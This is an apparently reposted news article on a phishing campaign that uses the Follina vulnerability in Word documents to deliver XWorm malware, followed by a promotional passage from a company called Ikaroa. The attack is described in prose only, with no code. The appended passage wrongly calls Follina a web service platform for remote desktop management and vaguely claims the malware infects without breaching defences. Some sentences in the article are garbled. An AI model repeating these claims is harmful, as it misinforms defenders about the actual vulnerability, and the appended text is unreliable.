Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware to targeted systems.
Securonix, which tracks activity cluster under the name MEME#4CHANsaid some of the attacks have primarily targeted manufacturing companies and health clinics located in Germany.
“The attack campaign has been leveraging some rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims,” security researchers Den Iuzvyk, Tim Peck and Oleg Kolesnikov said in a new analysis shared with The Hacker News.
The report is based on recent findings by Elastic Security Labs, which revealed the threat actor’s fallback themed decoys to trick victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads.
The attacks begin with phishing attacks to distribute deceptive Microsoft Word documents that, instead of using macros, weaponize the Follina vulnerability (CVE-2022-30190, CVSS score: 7.8) to drop an obfuscated PowerShell script.
From there, threat actors abuse the PowerShell script to bypass the Antimalware Scanning Interface (AMSI), disable Microsoft Defender, set persistence, and finally release the .NET binary containing XWorm .
Interestingly, one of the variables in the PowerShell script is called “$CHOTAbheem”, which is probably a reference to chhota bheeman Indian animated comedy adventure television series.
“From a quick check, it appears that the individual or group responsible for the attack may have a Middle Eastern/Indian background, although final attribution has yet to be confirmed,” they said researchers at The Hacker News, noting that these keywords. can also be used as a cover.
XWorm is basic malware that is advertised for sale on underground forums and includes a wide range of features that allow it to siphon sensitive information from infected hosts.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.
Save my seat!
The malware is also a Swiss army knife as it can perform clipper, DDoS and ransomware operations, spread via USB and launch additional malware.
The exact origins of the threat actor are currently unclear, although Securonix said the attack methodology shares similar artifacts to TA558, which has been seen affecting the hospitality industry in past
“While phishing emails rarely use Microsoft Office documents since Microsoft made the decision to disable macros by default, today we’re seeing proof that it’s still important to be on the lookout for malicious document files, especially in this case where there was no VBscript execution from macros,” the researchers said.
Source link
Ikaroa, a full stack tech company, cautions organizations about the emerging XWorm malware that has surfaced, exploiting a recently-discovered vulnerability in Follina. The malware is being employed in this new wave of attacks, prompting organizations to take all possible measures to protect themselves.
The XWorm malware is a potent threat as it doesn’t necessarily need to penetrate a targeted system to take effect. In fact, it is believed to have capabilities of delivering malware onto a targeted system without having to break through firewalls or other defenses.
The Follina vulnerability has given the XWorm malicious code a pathway to worm through. It exploits the Follina web service platform, commonly used for remote desktop and server management. This means that any device connected to the platform is actually at risk for exploitation by XWorm, allowing the malware to deliver payloads and install programs that access system data and other sensitive information.
Organizations running Follina should take all necessary steps to ensure their systems are secure, or risk having their data maliciously exploited or compromised. This could include installing security tools like firewalls, antivirus, anti-malware, and intrusion prevention systems, as well as keeping their system patched and up-to-date.
It is recommended that organizations should also use robust users’ authentication and access control methods, such as two-factor authentication, and have appropriate security controls in place to prevent malicious code from being installed on their systems.
At Ikaroa, our team of experienced security professionals are available to provide companies with technical assistance in order to ward off this wave of attacks. We urge organizations to contact us for help in defending against XWorm and other malicious codes and ensure the security of their operations.
